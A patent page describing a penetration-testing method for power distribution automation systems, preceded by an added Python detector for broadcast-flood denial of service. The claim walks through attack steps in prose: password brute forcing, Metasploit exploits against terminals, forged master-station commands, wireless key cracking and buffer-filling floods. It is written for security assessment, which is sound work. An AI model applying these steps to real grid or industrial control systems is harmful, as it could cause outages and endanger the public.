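The denial-of-service test in item 7 here and in item 10 of the terminal tests both rely on a broadcast flood that fills the slave station's receive buffer. The detection logic below is an added example for this page (not the patent's code): it runs over constructed capture summary lines of the form `<epoch_seconds> <src_ip> <dst_ip> <length>` and raises one alert per source whose broadcast frames exceed a rate threshold within a sliding one-second window. The network segment, addresses, threshold and sample traffic are all constructed placeholders.

```python
"""Broadcast-flood detector for the denial-of-service tests above.

Added example, not from the patent. Input is a text of constructed capture
summary lines: '<epoch_seconds> <src_ip> <dst_ip> <length>'. Addresses,
segment, threshold and sample traffic are constructed placeholders.
"""
from __future__ import annotations

import ipaddress
from collections import defaultdict, deque

# Constructed: the distribution network segment. Its directed broadcast address
# and the limited broadcast address both count as broadcast destinations.
SEGMENT = ipaddress.ip_network("192.0.2.0/24")
BROADCAST_DSTS = {str(SEGMENT.broadcast_address), "255.255.255.255"}

# Constructed threshold: normal polling produces a handful of broadcasts per
# second at most; a buffer-filling flood is orders of magnitude above that.
THRESHOLD_PER_SECOND = 50
WINDOW_SECONDS = 1.0

# Constructed sample capture: quiet unicast polling, then one host flooding
# broadcasts, then a single legitimate broadcast from the polling master.
SAMPLE_LOG = "\n".join(
    [f"{1700000000 + i * 0.25:.3f} 192.0.2.10 192.0.2.20 64" for i in range(8)]
    + [f"{1700000002 + i * 0.01:.3f} 192.0.2.77 192.0.2.255 1500" for i in range(80)]
    + ["1700000003.500 192.0.2.10 192.0.2.255 60"]
)


def parse_line(line: str) -> tuple[float, str, str, int]:
    """Split one summary line into (timestamp, src, dst, length)."""
    ts, src, dst, length = line.split()
    return float(ts), src, dst, int(length)


def detect_broadcast_flood(
    log_text: str,
    threshold: int = THRESHOLD_PER_SECOND,
    window: float = WINDOW_SECONDS,
) -> list[tuple[str, float, int]]:
    """Return one alert per offending source: (src, first_alert_time, peak_rate).

    For each source a deque holds the timestamps of its broadcast frames that
    fall inside the trailing window; an alert is raised the first time the
    deque grows past the threshold and its peak length is tracked afterwards.
    """
    windows: dict[str, deque] = defaultdict(deque)
    alerts: dict[str, tuple[float, int]] = {}
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, _ = parse_line(line)
        if dst not in BROADCAST_DSTS:
            continue                      # unicast traffic is not of interest
        q = windows[src]
        q.append(ts)
        while q and ts - q[0] > window:   # slide the window forward
            q.popleft()
        if len(q) > threshold:
            first, peak = alerts.get(src, (ts, 0))
            alerts[src] = (first, max(peak, len(q)))
    return [(src, first, peak) for src, (first, peak) in alerts.items()]


if __name__ == "__main__":
    for src, first, peak in detect_broadcast_flood(SAMPLE_LOG):
        print(f"broadcast flood from {src}: first seen {first:.3f}, peak {peak} frames/window")
```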
The distribution automation system information security penetration testing method provided in the embodiment of the present invention performs penetration testing on the master station system, the distribution terminals and the communication channel, making full use of information system vulnerability penetration testing techniques, including collection of power automation system information, port scanning, password guessing, remote overflow, local overflow, script testing and privilege escalation. Each stage has corresponding professional techniques and tools, so that the test results are comprehensive and accurate. By simulating the attack methods of hackers, the security of the distribution automation system is assessed, including active analysis of any weaknesses, technical defects or vulnerabilities in the master station system, communication lines and distribution terminals. The method can be used for security risk analysis before the distribution automation system goes into networked operation, and provides guidance for manufacturers whose products have potential safety hazards to complete rectification and re-testing. The method is highly targeted and wide in test scope, greatly shortens the testing time compared with traditional penetration testing, and reduces the occurrence of equipment being taken offline for maintenance because of security-related failures after commissioning. It not only meets the needs of distribution automation system information security risk penetration testing but can also be extended to industrial control systems inside and outside the power industry, avoiding large-scale distribution substation blackouts caused by information security attacks and providing important support for national industrial control system information security assurance.
The foregoing is merely a preferred embodiment of the present invention and is not intended to limit the invention; any modifications, equivalent substitutions and improvements made within the spirit and principles of the present invention shall be included in the scope of protection of the present invention.

Claims (1)

  1. A distribution automation system information security penetration testing method, characterized in that the method uses information system vulnerability penetration testing techniques, including collection of power automation system information, port scanning, password guessing, remote overflow, local overflow, script testing and privilege escalation, and assesses the security of the distribution automation system by simulating the attack methods of hackers, including active analysis of any weaknesses, technical defects or vulnerabilities in the master station system, communication lines and distribution terminals, and specifically includes:
    Step 1, performing penetration testing on the master station system;
    Step 2, performing penetration testing on the distribution terminals;
    Step 3, performing penetration testing on the communication channel;
    In step 1, the specific implementation of penetration testing on the master station system is:
    delimiting the test scope: defining the SCADA servers, FES servers and WEB servers as the scope of the target network environment, and determining the test content, test method, test conditions and test targets;
    using various public resources to obtain information relating to the test target;
    locating the target's network state, operating system and associated network architecture;
    finding all open ports in the target system and enumerating the currently running services through the open ports;
    making a more meaningful weak password dictionary from highly reliable background information such as personal mailboxes, telephone numbers and commonly used user accounts, and performing weak password scanning;
    discovering vulnerabilities by combining the two different testing methods, automatic and manual;
    exploiting vulnerabilities, penetrating the target system through existing exploit programs;
    the tester escalating privileges using local vulnerabilities of the current system environment to obtain superuser or system-level privileges;
    when using various public resources to obtain information relating to the test target, the information on the test target is collected from the internet, with relevant data obtained from various search engines or useful information collected using professional data-mining tools;
    In step 2, the specific implementation of penetration testing on the distribution terminals is:
    information gathering test: the penetration testing engineer asks the administrator about the bus structure, protocol type and asset importance level, performs a network scan with dedicated protocol addressing software, learns the live terminals and terminal addresses in the industrial control network, and thereby carries out the information gathering test;
    system vulnerability collection: the penetration testing engineer searches for the latest vulnerability information and dedicated programming-system vulnerabilities on the website of the US Industrial Control Systems Cyber Emergency Response Team, www.us-cert.gov/control_systems/ics-cert/, and on the industrial-control security professional forum www.scadahacker.com;
    vulnerability scanning: the penetration testing engineer scans the lower-level devices for vulnerabilities using plug-ins, finding known vulnerabilities and their severity;
    firmware vulnerability collection: the penetration testing engineer looks up the device's vulnerability information and latest firmware version in the security bulletins of the lower-level device's manufacturer, and determines whether vulnerabilities exist by checking whether the lower-level device has been upgraded to the latest firmware version in time;
    vulnerability exploitation test: the penetration testing engineer writes exploit programs for the lower-level device using the METASPLOIT tool, and tests and verifies the severity of the vulnerabilities;
    code download test: the penetration testing engineer learns the terminal device's settings through dedicated programming software or command debugging software, such as whether source code download is allowed, whether compiled code download is allowed, whether the code is encrypted, and whether it can be read remotely;
    code upload test: the penetration testing engineer, using a forged engineer station with programming-system software or command debugging software, performs a firmware upgrade or code update on the terminal and tests whether the new code can be executed successfully;
    slave computer command test: the penetration testing engineer captures the data link layer, network layer, transport layer and application layer traffic with SNIFFER packet sniffing software to obtain the data sent by the terminal, inspects the packet content, source address and destination address with a protocol analyzer, modifies the data, resends it, and checks whether the substation receives and executes it;
    host computer command test: the penetration testing engineer captures the data link layer, network layer, transport layer and application layer traffic with SNIFFER packet sniffing software to obtain the data sent by the host computer, inspects the command content, source address and original address with a protocol analyzer, modifies the master station's command, forges a host-to-slave command, and checks whether the substation receives and executes it;
    denial-of-service test: the penetration testing engineer fills the slave station's data buffer by sending a large number of broadcast packets, so that the slave station can no longer normally receive the data sent by the master station;
    In step 3, the specific implementation of penetration testing on the communication channel is:
    network connection test: the penetration testing engineer connects the testing tools to the industrial control system network either in wired access mode, through an industrial switch, or in wireless access mode, by searching for wireless network signals;
    wireless network strength test: the penetration testing engineer cracks WEP, WPA, WPA2, AES and DES with the BT wireless cracking tools to obtain the encryption key, and then accesses the industrial control system network with a legitimate identity;
    network device vulnerability collection test: the penetration testing engineer checks the firmware of network devices such as industrial switches to see whether it is the latest version, and searches for the latest vulnerability information on the industrial-control security professional forum www.scadahacker.com;
    network device control detection: the penetration testing engineer attempts to log in to the administrator account using weak passwords and brute force, and after obtaining administrator rights modifies the configuration information of the network device, such as port information, network segment isolation information and device addresses, to carry out tests such as interrupting sessions and impersonating the master station;
    message monitoring test: the penetration testing engineer captures the data link layer, network layer, transport layer and application layer traffic with SNIFFER packet sniffing software to obtain the data sent by the terminal, and inspects the packet content, source address and destination address with a dedicated protocol analyzer;
    message modification test: the penetration testing engineer analyzes the captured packets, modifies their source address, destination address and data content, and then resends them;
    denial-of-service test: the penetration testing engineer fills the slave station's data buffer by sending a large number of broadcast packets, so that the slave station can no longer normally receive the data sent by the master station, or restarts the network device to interrupt the network session, causing a network denial of service;
    the distribution automation system information security penetration testing method is used for penetration testing of the master station system, the communication channel and the distribution terminals; the master station system is communicatively connected to the distribution terminals through the communication channel; the communication channel includes Ethernet and GPRS; and the distribution terminals include distribution terminal DTU, distribution terminal FTU and distribution terminal DTU/FTU.
CN201410680264.6A 2014-11-24 2014-11-24 A kind of electrical power distribution automatization system information security penetration testing method Active CN104468267B (en)


Publications (2)

Publication Number Publication Date
CN104468267A CN104468267A (en) 2015-03-25
CN104468267B true CN104468267B (en) 2017-12-12




Legal Events

Date Code Title Description
C06 Publication
PB01 Publication
SE01 Entry into force of request for substantive examination
CB03 Change of inventor or designer information
Inventor after: Chen Liang, Shi Wei, Tang Ping, Xie Hao, Li Zhibin, Huang Gang, Li Xiaohui, Gong Chenghu, Zhao Jing, Wang Kan, Liang Ruihong, Lin Yongfeng, Zhang Guoqiang, Yin Bo, Wang Jianfeng, Xiang Tianchun, Li Guodong, Li Jie, Cui Jie
Inventor before: Chen Liang, Lin Yongfeng, Zhang Guoqiang, Tang Ping, Li Xiaohui, Gong Chenghu
GR01 Patent grant